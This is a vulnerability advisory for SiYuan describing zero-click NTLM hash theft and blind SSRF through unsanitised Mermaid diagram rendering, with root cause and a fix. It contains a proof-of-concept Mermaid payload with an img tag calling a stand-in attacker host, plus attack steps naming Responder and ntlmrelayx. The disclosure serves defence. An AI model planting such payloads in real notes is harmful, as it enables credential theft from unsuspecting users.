CVE-2026-40107
SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
Description
SiYuan configures Mermaid.js with `securityLevel: "loose"` and `htmlLabels: true`. In this mode, `<img>` tags with `src` attributes survive Mermaid's internal DOMPurify and land in SVG `<foreignObject>` blocks. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\attacker.com\image.png`). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. ## Root Cause Mermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33: mermaid.initialize({ securityLevel: "loose", flowchart: { htmlLabels: true, }, }); SVG injection at line 101: renderElement.lastElementChild.innerHTML = mermaidData.svg; No DOMPurify or other sanitization between the Mermaid output and DOM insertion. Mermaid v11.12.0 in "loose" mode strips active JavaScript (`<script>`, `onerror`, `onload`) but explicitly allows `<img>` tags with `src` attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration. The Electron main process at `app/electron/main.js` line 78 sets `disable-web-security`, and lines 319+ set `webSecurity: false`, `nodeIntegration: true`, `contextIsolation: false` on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths. ## Proof of Concept Mermaid code block in a SiYuan note: ```mermaid graph TD A["<img src='//attacker.com/share/img.png'>"] --> B[Normal Node] ``` Rendered SVG output (verified with Mermaid CLI 11.12.0, `securityLevel: "loose"`, `htmlLabels: true`): <foreignObject> <div xmlns="http://www.w3.org/1999/xhtml"> <span class="nodeLabel"> <p><img src="//attacker.com/share/img.png" style="..."></p> </span> </div> </foreignObject> What was stripped by Mermaid's internal sanitizer (verified): `onerror`, `onload`, all event handler attributes, `<script>` tags, `file://` URLs. What survived (verified): `<img src="http://...">`, `<img src="//...">`. Attack steps: 1. Attacker creates a note or .sy export containing the Mermaid block above 2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger) 3. Victim imports the notebook or opens the shared note 4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML 5. Electron fetches `//attacker.com/share/img.png` On Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server. On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read. ## Impact Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine. No configuration changes required. The `securityLevel: "loose"` setting is hardcoded in SiYuan's Mermaid initialization. ## Suggested Fix Change Mermaid initialization to `securityLevel: "strict"`. If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip `<img>` tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.